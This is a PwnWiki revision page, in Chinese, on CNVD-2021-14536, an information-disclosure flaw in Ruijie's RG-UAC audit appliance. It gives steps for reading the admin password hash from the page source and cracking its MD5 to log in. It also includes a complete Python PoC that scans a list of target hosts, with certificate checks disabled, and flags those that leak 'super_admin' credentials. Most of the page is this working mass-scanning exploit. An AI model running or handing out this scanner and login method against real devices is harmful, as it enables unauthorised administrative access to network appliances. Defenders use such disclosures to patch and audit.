Difference between revisions of "CNVD-2021-14536 銳捷RG-UAC信息洩露漏洞"
From PwnWiki
(已標記此版本用來翻譯) |
|||
| Line 6: | Line 6: | ||
</pre> | </pre> | ||
| − | <translate>F12查看網頁源碼搜索關鍵字</translate><code>admin</code> | + | <translate><!--T:1--> F12查看網頁源碼搜索關鍵字</translate><code>admin</code> |
[[檔案:Cnvd1.jpg|400px]] | [[檔案:Cnvd1.jpg|400px]] | ||
| − | <translate>使用 password值 md5解密即可登錄。(用戶名admin)</translate> | + | <translate><!--T:2--> 使用 password值 md5解密即可登錄。(用戶名admin)</translate> |
==POC== | ==POC== | ||
| Line 62: | Line 62: | ||
</pre> | </pre> | ||
| − | <translate>==參考==</translate> | + | <translate>==參考== <!--T:3--></translate> |
https://mp.weixin.qq.com/s/LbSPzt__mKdNN83RhJ2bwA | https://mp.weixin.qq.com/s/LbSPzt__mKdNN83RhJ2bwA | ||
Revision as of 14:29, 8 March 2021
POC
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mFile >>> ip.txt \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
def Scan(file_name):
with open(file_name, "r", encoding='utf8') as scan_url:
for url in scan_url:
if url[:4] != "http":
url = "http://" + url
url = url.strip('\n')
try:
POC_1(url)
except Exception as e:
print("\033[31m[x] 请求报错 \033[0m".format(e))
continue
if __name__ == '__main__':
title()
file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))
Scan(file_name)